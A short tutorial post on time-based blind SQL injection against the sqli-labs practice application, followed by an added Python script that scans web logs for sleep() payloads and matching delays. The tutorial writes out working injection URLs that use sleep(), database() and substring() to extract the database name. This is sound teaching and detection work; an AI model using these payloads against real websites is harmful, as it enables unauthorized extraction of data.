SQL Injection 4

Time to move on to time-based SQLi.

 

Time based SQLi

The process is almost the same as boolean-based. The thing that changes is the way to identify a true condition. Let’s visit level 9 of sqlilabs.

A true condition is identified using the sleep function:
(True) and sleep(10)

Let’s verify that it works properly:
http://192.168.1.11/sqli-labs-master/Less-9/?id=1' and sleep(10) --+

And the web page takes 10 seconds to load.

 

Now we perform the first query; if 1=1 holds, the page waits 10 seconds:
http://192.168.1.11/sqli-labs-master/Less-9/?id=1' and sleep(10) and 1=1 --+

Next step is to extract useful information:
http://192.168.1.11/sqli-labs-master/Less-9/?id=1' and sleep(10) and database()='security' --+

To extract the database name, or anything else we need, we again use the substring function:
http://192.168.1.11/sqli-labs-master/Less-9/?id=1' and sleep(10) and substring(database(),1,1)='s' --+
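
From the defender's side, requests like the ones above stand out in web server logs: the query string carries a sleep() call and the response time matches the requested delay. The following is an added example, not part of the original post, that flags such requests. The log format (request time in seconds as the last field), the client addresses and the timings are constructed assumptions.

```python
import re
from urllib.parse import unquote_plus

# Constructed log lines. Assumed format: combined-style request line, status,
# bytes, then request time in seconds (e.g. nginx $request_time) as last field.
SAMPLE_LOG = [
    '192.168.1.50 - - [10/Oct/2023:13:55:01 +0000] "GET /sqli-labs-master/Less-9/?id=1 HTTP/1.1" 200 721 0.004',
    '192.168.1.50 - - [10/Oct/2023:13:55:12 +0000] "GET /sqli-labs-master/Less-9/?id=1%27%20and%20sleep(10)%20--+ HTTP/1.1" 200 721 10.006',
    '192.168.1.50 - - [10/Oct/2023:13:55:30 +0000] "GET /sqli-labs-master/Less-9/?id=1%27%20and%20sleep(10)%20and%20database()=%27security%27%20--+ HTTP/1.1" 200 721 0.005',
    '192.168.1.60 - - [10/Oct/2023:13:56:02 +0000] "GET /blog/?q=how+to+sleep+better HTTP/1.1" 200 5120 0.030',
]

LINE_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+" \d{3} \d+ ([\d.]+)$')
SLEEP_RE = re.compile(r'\bsleep\s*\(\s*(\d+(?:\.\d+)?)\s*\)', re.IGNORECASE)

def fully_decode(value, rounds=3):
    """URL-decode repeatedly so double-encoded payloads are also normalised."""
    for _ in range(rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify(line):
    """Return 'clean', 'probe' (sleep() sent, no delay), 'delayed' or 'unparsed'."""
    match = LINE_RE.search(line)
    if not match:
        return "unparsed"
    query = fully_decode(match.group(1)).partition("?")[2]
    elapsed = float(match.group(2))
    call = SLEEP_RE.search(query)
    if not call:
        return "clean"
    # Response took at least as long as the requested sleep: the injected
    # function ran inside the database, so the parameter is injectable.
    return "delayed" if elapsed >= float(call.group(1)) else "probe"

def scan(lines):
    """Classify every log line, preserving order."""
    return [classify(line) for line in lines]

if __name__ == "__main__":
    for verdict, line in zip(scan(SAMPLE_LOG), SAMPLE_LOG):
        print(f"{verdict:8} {line.split(chr(34))[1]}")
```

A "delayed" verdict means the injected function actually executed and the endpoint needs fixing (parameterized queries); a "probe" verdict means someone tried and the delay did not occur.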
